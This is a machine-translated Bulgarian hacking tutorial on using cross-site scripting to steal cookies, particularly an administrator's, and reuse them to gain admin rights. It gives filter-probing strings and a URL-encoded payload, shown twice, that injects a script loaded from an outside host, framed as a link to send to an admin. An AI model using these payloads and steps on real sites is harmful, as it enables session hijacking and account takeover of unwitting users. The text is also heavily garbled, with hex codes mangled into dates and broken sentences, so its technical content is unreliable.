ПредишенСледващото

### Как да се използва XSS.

Първо, трябва да знаем какво Cookie.
Ако знаете, че можете да пропуснете.

Cookie използва, за да спаси пълномощията сайт на посетител компютър.
Ако се регистрирате на сайта под псевдонима "blabluble", а след това на сайта, които сте запазили на компютъра файл с бисквити, които са кодирани вашите данни.
И ако сте администратор и имате достъп до сайта, а аз - на потребителя, който е откраднал от вас (администратор) бисквитки, тогава мога спокойно да отидете на сайта, както и на сайта, който идентифицира като "админ" - Бих имате администраторски права.

За да промените (за замяна на откраднати) бисквитки съветват ispolzuvat CookieEdit прог за IE или вградени функции в Opera и Firefox безплатно.


### Какво е XSS атака?

XSS атаки - това е атака не на самото място, но от потребителите на сайта.
XSS - това е дефект в прилагането на филтъра.

Има пасивна и активна XSS XSS.

Какво е пасивна XSS?

Active - е XSS, които не изискват никакви допълнителни действия от страна на жертвата - това е достатъчно, за да отворите страницата с XSS и Java код ще се изпълни автоматично.
Благодарение на автоматизация - те са много полезни и ценни.
Например, активното ХСС съществуват в ББ- тагове, поради недостатъчен филтриране, когато оставяте съобщение на форум # 092; # 092 книга за гости, чат, който е винаги активно с всяка актуализация.


### Така че, нека специфични за това как да се намери в този сайт XSS.

Как да разбера, че XSS се провежда на място дан?
Ужасно rasprastrannonaya тип uzyavimost

Ние се опитваме да го поставете във всички различни области на сценария. ако съобщението дойде след процес на скрипта и да изпълни.

Най пролиферация XSS (nablyudaetsya на всички места, където лошото филтриране):


Целият смисъл ">.
Нека да мислим за това, което правим, когато сме въведете в полето ">, какво ще се случи?
Представяме в матрицата

някои променлива стойност поле prisvaivaetsya. Частично обработени "> извършваме, се затваря
скрипт и vyprolnyaet

Това XSS е навлизането в търсачките:
Разглеждаме всички на сайта на поле и се опитайте да поставите


Ако се остави съобщение - сте намерили XSS.


### Как да определите има филтър или не?

Просто въведете във всяка област: ""; # 33; - "<########>=
След това отворете страницата с HTML и за думата изглежда "########"
и да видим следната стойност на набор знаци ..

ако <> и да го остави Pervan признак на уязвимост - това означава, че филтърът има дупка.
Ако "" # 092; героите си остават същите, тъй като те са въведени - това е вторият знак на уязвимост - Възможни допълнителни знаци за последващи XSS атака.
След това, ако отворите HTML, вие сте не е намерен <> е вероятно, че дупката във филтъра.
Ако отворите HTML установите, че <> заменят с други знаци, това е неприятно - филтъра
Тя функционира нормално.
Може би дори да влезе в областта, за да проверите филтъра така: "><>'' ", / # 092 ;? @%

Да разгледаме случая, ако филтъра се храни <>

В този случай, има възможност от една дупка.
Например, условие филтър за ядене

- 2) Можете да направите много по следния начин:


този метод е по-надежден.


% 68% 74% 74% 70% 3A% 2F% 2F% 2А% 2А% 2А% 2А% 2А% 2Е% 72% 75% 2F% 06 юни% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6В% 6Е% 65% 74% 2Е% 68% 31% 36% 2Е% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6А% 07 март% 2Е% 6А% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E

тя е кодирана:

- 3) Особено криптиране е необходимо не само за измама на филтри, но за измамата, когато се използва ПАСИВЕН ADMIN ХСС.

Това, което прави document.location.href ме питаш? )). е Java код, който минава и без искане на определен сайт Чо толкова добре получаваме, ние даде линк към администратора и той дойде в нашия сайт, ето какво се прави. тя бързо се хвърля


% 68% 74% 74% 70% 3A% 2F% 2F% 2А% 2А% 2А% 2А% 2А% 2Е% 72% 75% 2F% 06 юни% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6В% 6Е% 65% 74% 2Е% 68% 31% 36% 2Е% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6А% 07 март% 2Е% 6А% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E


и той вече е наш XSS в шифрован вид.

Забележка: това ще работи само когато XSS ще принадлежи на сайта на администратор ви изхвърля връзка.

Свързани статии

Подкрепете проекта - споделете линка, благодаря!